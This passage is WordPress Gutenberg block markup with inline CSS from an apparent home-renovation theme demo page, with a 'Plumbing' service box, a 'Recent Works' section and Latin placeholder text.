class=\"skt-blocks-advanced-column-child block-b6bfc812-3413-49c0-a306-0ead7dc25f71\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"0246a0b4-b038-4227-bbfb-f2e04361b8d2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Plumbing</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8a2535a5-ba23-48dc-aa2f-8d6e2e384f43\"} -->\n<style type=\"text/css\"> .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"9c28eb24-8a51-4aaa-b8b9-2c2b39522605\"} -->\n<style type=\"text/css\"> .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"783eb3b3-d1c3-49b9-90d8-afecee322852\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-783eb3b3-d1c3-49b9-90d8-afecee322852\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We take pride in our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17}},\"textColor\":\"white\",\"className\":\"section-content\"} -->\n<p class=\"section-content has-white-color has-text-color\" style=\"font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"7fdef199-26ec-46ac-b2e9-e54d01000475\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"5e6e58f8-acdc-4281-9713-b2c98a4e716d\"} -->\n<style type=\"text/css\"> .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5e6e58f8-acdc-4281-9713-b2c98a4e716d .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5e6e58f8-acdc-4281-9713-b2c98a4e716d\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider 